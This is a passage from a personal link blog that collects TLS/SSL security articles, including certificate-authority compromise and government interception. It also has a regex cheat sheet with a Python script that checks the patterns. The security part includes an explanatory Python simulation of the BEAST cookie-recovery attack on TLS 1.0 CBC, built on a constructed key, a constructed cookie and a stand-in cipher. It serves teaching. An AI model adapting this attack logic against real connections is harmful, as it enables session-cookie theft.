    • Chief culprits for the inertia are the Network Security Services (http://www.mozilla.org/projects/security/pki/nss/) package used to implement SSL in Mozilla’s Firefox and Google’s Chrome browsers, and OpenSSL (http://openssl.org/), an open-source code library that millions of websites use to deploy TLS. In something of a chicken-and-egg impasse, neither toolkit offers recent versions of TLS, presumably because the other one doesn’t.
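
The “block-wise chosen-plaintext attack” the quotes above keep mentioning rests on a TLS 1.0 property the articles do not spell out: in CBC mode the last ciphertext block of one record is used as the IV of the next record, and that block is visible on the wire, so an attacker who can get the victim to send chosen bytes knows the next IV before choosing them. TLS 1.1 switched to an explicit, unpredictable IV per record, which is why the articles report it as unaffected. The Python model below is added here to show how that turns into byte-by-byte cookie recovery; it is not the BEAST paper’s or demo’s code. Everything in it is constructed: the key, the cookie SID=…, the filler, and block_encrypt, an HMAC-based stand-in for a single AES block operation. It also does not model how Duong and Rizzo got a browser to emit precisely aligned records (the same-origin bypass mentioned above); Victim.request simply grants that ability.

```python
import hashlib
import hmac

BLOCK = 16


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for one raw block-cipher call (AES on a single 16-byte block).
    A keyed PRF is enough here: the attack never decrypts, it only compares
    ciphertext blocks, so swapping in real AES-ECB leaves it unchanged."""
    assert len(block) == BLOCK
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Tls10CbcSender:
    """CBC record layer the way TLS 1.0 does it: the IV of each record is the
    last ciphertext block of the previous record, which a sniffer can see."""

    def __init__(self, key: bytes, initial_iv: bytes):
        self.key = key
        self.chain = initial_iv   # only this first IV is secret (derived from the key block)
        self.wire = []            # every ciphertext block sent, as a sniffer sees them

    def send_record(self, plaintext: bytes) -> list:
        if len(plaintext) % BLOCK:
            raise ValueError("this model expects records already padded to 16 bytes")
        out = []
        for i in range(0, len(plaintext), BLOCK):
            c = block_encrypt(self.key, xor(plaintext[i:i + BLOCK], self.chain))
            out.append(c)
            self.chain = c
        self.wire.extend(out)
        return out


class Victim:
    """The browser: sends attacker-chosen bytes followed by its session cookie
    over the same connection, as BEAST's JavaScript agent makes it do."""

    def __init__(self, sender: Tls10CbcSender, secret: bytes):
        self.sender = sender
        self.secret = secret

    def request(self, attacker_prefix: bytes) -> list:
        body = attacker_prefix + self.secret
        body += b"\x00" * (-len(body) % BLOCK)   # filler to a block multiple (constructed)
        return self.sender.send_record(body)


def recover_secret(victim: Victim, sender: Tls10CbcSender, secret_len: int) -> bytes:
    """Block-wise chosen-boundary attack: recover the secret one byte at a time."""
    known = b""
    for j in range(secret_len):
        # Pick the prefix length so that secret byte j is the LAST byte of a block;
        # the other 15 bytes of that block are then already known to the attacker.
        prefix = b"A" * (BLOCK - 1 - (j % BLOCK))
        blocks = victim.request(prefix)
        b = j // BLOCK                       # index of the block that ends in byte j
        target = blocks[b]
        # Chaining value XORed into the target block before encryption: the previous
        # block of this record, or the last wire block before this record began.
        prev = blocks[b - 1] if b > 0 else sender.wire[-len(blocks) - 1]
        known15 = (prefix + known)[b * BLOCK:b * BLOCK + BLOCK - 1]
        for g in range(256):
            guess = known15 + bytes([g])
            # The next record's IV is sender.wire[-1]; cancel it so the probe's first
            # block encrypts exactly guess XOR prev, as the target block did.
            probe = xor(xor(guess, prev), sender.wire[-1])
            if sender.send_record(probe)[0] == target:
                known += bytes([g])
                break
        else:
            raise RuntimeError("no byte matched: the model is inconsistent")
    return known


def demo() -> bytes:
    key = b"constructed-key!"                        # 16 bytes, constructed
    sender = Tls10CbcSender(key, initial_iv=b"\x5a" * BLOCK)
    # An earlier record on the connection: its last ciphertext block becomes the
    # IV of the next record and is on the wire, which is all the attacker needs.
    sender.send_record(b"GET / HTTP/1.1\r\nHost: example\r\n".ljust(32, b" "))
    victim = Victim(sender, b"SID=a1b2c3d4e5f6g7h8")  # constructed 20-byte cookie
    return recover_secret(victim, sender, len(victim.secret))


if __name__ == "__main__":
    print(demo())
```

Each probe costs one record, so a byte needs at most 256 records and the 20-byte cookie at most 5,120; the published attack is more efficient than this brute-force loop, but the mechanism is the same. Under TLS 1.1 and 1.2 the sniffer’s sender.wire[-1] is no longer the next IV, the probe cannot be aligned, and the comparison in recover_secret says nothing; that is the whole of the fix the articles refer to.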

2011.01: Hacked certificate authorities

  • “Qualys endorses alternative to crappy SSL system” by Dan Goodin (The Register; 2011.09.30) – http://www.theregister.co.uk/2011/09/30/qualys_endorses_convergence/
  • “Certified Lies: Detecting and Defeating Government Interception Attacks Against SSL” (Cryptogon.com; 2011.01.31) – http://cryptogon.com/?p=20288 | download – http://files.cloudprivacy.net/ssl-mitm.pdf.
      Abstract: This paper introduces the compelled certificate creation attack, in which government agencies may compel a certificate authority to issue false SSL certificates that can be used by intelligence agencies to covertly intercept and hijack individuals’ secure Web-based communications. Although we do not have direct evidence that this form of active surveillance is taking place in the wild, we show how products already on the market are geared and marketed towards this kind of use—suggesting such attacks may occur in the future, if they are not already occurring. Finally, we introduce a lightweight browser add-on that detects and thwarts such attacks.
  • “In SSL We Trust? Not Lately” by Wolfgang Kandek (Dark Reading; 2010.04.07) – http://www.darkreading.com/blog/archives/2010/04/trust_in_ssl_st.html
  • “Certified Lies: Detecting and Defeating Government Interception Attacks Against SSL” (2010.03) – http://paranoia.dubfire.net/2010/03/new-paper.html | http://files.cloudprivacy.net/ssl-mitm.pdf
      Abstract: This paper introduces a new attack, the compelled certificate creation attack, in which government agencies compel a certificate authority to issue false SSL certificates that are then used by intelligence agencies to covertly intercept and hijack individuals’ secure Web-based communications. We reveal alarming evidence that suggests that this attack is in active use. Finally, we introduce a lightweight browser add-on that detects and thwarts such attacks.
  • “Governments Using Forged SSL Certificates for Man in the Middle Attack on “Secure” Web Sessions” (Cryptogon.com; 2010.03.25) – http://cryptogon.com/?p=14505
  • “Law Enforcement Appliance Subverts SSL” by Ryan Singel (Wired; 2010.03.24) – http://www.wired.com/threatlevel/2010/03/packet-forensics/

2010.04.06

FAQ makers/creators

Filed under: it, javascript — sandokan65 @ 15:30

JavaScript code sites

Filed under: javascript — sandokan65 @ 15:26

Urban myths

Filed under: memetics — sandokan65 @ 12:48

2010.04.02

Regular expressions

Sites

Tools

Standalone tools:

Online testers:

Books

Tidbits

Sources: The above links.

  • [abc] – A single character: a, b or c
  • [^abc] – Any single character but a, b, or c
  • [a-z] – Any single character in the range a-z
  • [a-zA-Z] – Any single character in the range a-z or A-Z
  • ^ – Start of line
  • $ – End of line
  • \A – Start of string
  • \z – End of string
  • . – Any single character
  • \s – Any whitespace character
  • \S – Any non-whitespace character
  • \d – Any digit
  • \D – Any non-digit
  • \w – Any word character (letter, number, underscore)
  • \W – Any non-word character
  • \b – Word boundary (a zero-width assertion; it consumes no character)
  • (…) – Capture everything enclosed
  • (a|b) – a or b
  • a? – Zero or one of a
  • a* – Zero or more of a
  • a+ – One or more of a
  • a{3} – Exactly 3 of a
  • a{3,} – 3 or more of a
  • a{3,6} – Between 3 and 6 of a
  • ^[ \t]*$ – Match a blank line (empty or containing only spaces/tabs)
  • \d{2}-\d{5} – Validate an ID number consisting of 2 digits, a hyphen, and another 5 digits

Special common strings:

  • Personal Name: ^[\w\.']{2,}([\s][\w\.']{2,})+$
  • Username: ^[\w\d\_\.]{4,}$
  • Password at least 6 symbols: ^.{6,}$
  • Password or empty input: ^.{6,}$|^$
  • email: ^[\_]*([a-z0-9]+(\.|\_*)?)+@([a-z][a-z0-9\-]+(\.|\-*\.))+[a-z]{2,6}$
  • Email address: \b[A-Za-z0-9_.%+-]+@[A-Za-z0-9_.%+-]+\.[A-Za-z]{2,4}\b (note: the range [A-z] often seen in this pattern also matches [ \ ] ^ _ ` and is written [A-Za-z] here)
  • US phone: \W?\d{3}\W?\d{3}\W?\d{4}
  • US Phone number: ^\+?[\d\s]{3,}$
  • US Phone with code: ^\+?[\d\s]+\(?[\d\s]{10,}$
  • URL: \b\w+://(\w|-|\.|/)+(/|\b)
  • US Social Security Number (SSN): \d{3}-\d{2}-\d{4}
  • US ZIP: \d{5}(-\d{4})?
  • IP (v4) address (loose; also accepts out-of-range octets such as 999.999.999.999): \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b
  • IP (v4) address: \b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
  • IP (v4) address: ^(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])(\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])){3}$
  • IP (v4) address: \b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
  • IP (v6) address:
  • MAC address: ^([0-9a-fA-F][0-9a-fA-F]:){5}([0-9a-fA-F][0-9a-fA-F])$
  • Positive Integers: ^\d+$
  • Negative Integers: ^-\d+$
  • Integer: ^-{0,1}\d+$
  • Positive Number: ^\d*\.{0,1}\d+$
  • Negative Number: ^-\d*\.{0,1}\d+$
  • Positive Number or Negative Number: ^-{0,1}\d*\.{0,1}\d+$
  • Floating point number: [-+]?([0-9]*\.[0-9]+|[0-9]+)
  • Floating point number: [-+]?(?:\b[0-9]+(?:\.[0-9]*)?|\.[0-9]+\b)(?:[eE][-+]?[0-9]+\b)?
  • Roman number: ^(?i:(?=[MDCLXVI])((M{0,3})((C[DM])|(D?C{0,3}))?((X[LC])|(L?XX{0,2})|L)?((I[VX])|(V?(II{0,2}))|V)?))$
  • Domain Name: ^([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,6}$
  • Domain Name: ^([a-z][a-z0-9\-]+(\.|\-*\.))+[a-z]{2,6}$
  • Windows File Name: (?i)^(?!^(PRN|AUX|CLOCK\$|NUL|CON|COM\d|LPT\d|\..*)(\..+)?$)[^\\\./:\*\?\"\|][^\\/:\*\?\"\|]{0,254}$
  • Date in format yyyy-MM-dd: (19|20)\d\d([- /.])(0[1-9]|1[012])\2(0[1-9]|[12][0-9]|3[01])
  • Date (dd mm yyyy, d/m/yyyy, etc.): ^([1-9]|0[1-9]|[12][0-9]|3[01])\D([1-9]|0[1-9]|1[012])\D(19[0-9][0-9]|20[0-9][0-9])$
  • Year 1900-2099: ^(19|20)[\d]{2,2}$
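
A small check of the validation patterns above, as an added example that is not code from the original post. It runs the loose and strict IPv4 patterns, the username pattern and the [A-z] versus [A-Za-z] ranges over constructed input (the SAMPLE_LOG line and the function names is_ipv4, extract_ipv4, tld_ok and username_ok are my own, not from the post) to show what each pattern actually accepts: the loose IPv4 form passes impossible octets, [A-z] admits punctuation, and Python's $ matches before a trailing newline, so whole-string checks need \Z (Python's spelling of the sheet's \z) or re.fullmatch.

```python
"""Exercising the input-validation patterns from the cheat sheet above.

Added example, not code from the original post.  It checks three things a
defender has to know before trusting one of these patterns:
  1. the loose IPv4 pattern (\\d{1,3} per octet) accepts out-of-range octets
     that the strict, alternation-based pattern rejects;
  2. the range [A-z] is wider than [A-Za-z]: in ASCII it also covers [ \\ ] ^ _ `;
  3. in Python, $ also matches just before a trailing newline, so a whole-string
     check must use \\Z (Python's spelling of the sheet's \\z) or re.fullmatch.
"""
import re

# Patterns taken from the cheat sheet (loose and strict IPv4, username).
IPV4_LOOSE = re.compile(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")
IPV4_STRICT = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}"
    r"(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
)
# The sheet's username pattern with its ^...$ anchors, and the same class
# re-anchored with \A...\Z so that only the entire string can match.
USERNAME_DOLLAR = re.compile(r"^[\w_.]{4,}$")
USERNAME_Z = re.compile(r"\A[\w_.]{4,}\Z")

# Constructed sample log line: one valid address and two impossible ones.
SAMPLE_LOG = "src=10.0.0.7 dst=300.1.2.3 junk=1234.5.6.7"


def is_ipv4(text: str, strict: bool = True) -> bool:
    """True when the whole string is an IPv4 address under the chosen pattern."""
    pattern = IPV4_STRICT if strict else IPV4_LOOSE
    return pattern.fullmatch(text) is not None


def extract_ipv4(text: str, strict: bool = True) -> list:
    """Return every IPv4 address found in free text (e.g. a log line)."""
    pattern = IPV4_STRICT if strict else IPV4_LOOSE
    return pattern.findall(text)


def tld_ok(tld: str, fixed: bool = True) -> bool:
    """Check a 2-4 letter TLD with [A-Za-z] (fixed) or the buggy [A-z] range."""
    pattern = r"[A-Za-z]{2,4}" if fixed else r"[A-z]{2,4}"
    return re.fullmatch(pattern, tld) is not None


def username_ok(name: str, strict_end: bool = True) -> bool:
    """Validate a username; strict_end uses \\Z so a trailing newline is rejected."""
    pattern = USERNAME_Z if strict_end else USERNAME_DOLLAR
    return pattern.search(name) is not None


if __name__ == "__main__":
    for addr in ("10.0.0.7", "256.1.1.1", "999.999.999.999"):
        print(f"{addr:>16}: loose={is_ipv4(addr, strict=False)} strict={is_ipv4(addr)}")
    print("loose scan :", extract_ipv4(SAMPLE_LOG, strict=False))
    print("strict scan:", extract_ipv4(SAMPLE_LOG))
    print("[A-z] accepts 'c^m':", tld_ok("c^m", fixed=False), "| [A-Za-z]:", tld_ok("c^m"))
    print("'alice\\n' with $:", username_ok("alice\n", strict_end=False),
          "| with \\Z:", username_ok("alice\n"))
```

The loose pattern is fine for pulling candidate addresses out of a log for later checking, but it is not a validator; when a pattern gates input (a username, an address in a config), anchor it with \A and \Z or use re.fullmatch, and spell letter ranges out as [A-Za-z].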

Related (here at this blog):
Command line based text replace – https://eikonal.wordpress.com/2010/07/13/command-line-based-text-replace/ |
Perl online – https://eikonal.wordpress.com/2010/02/15/perl-online/
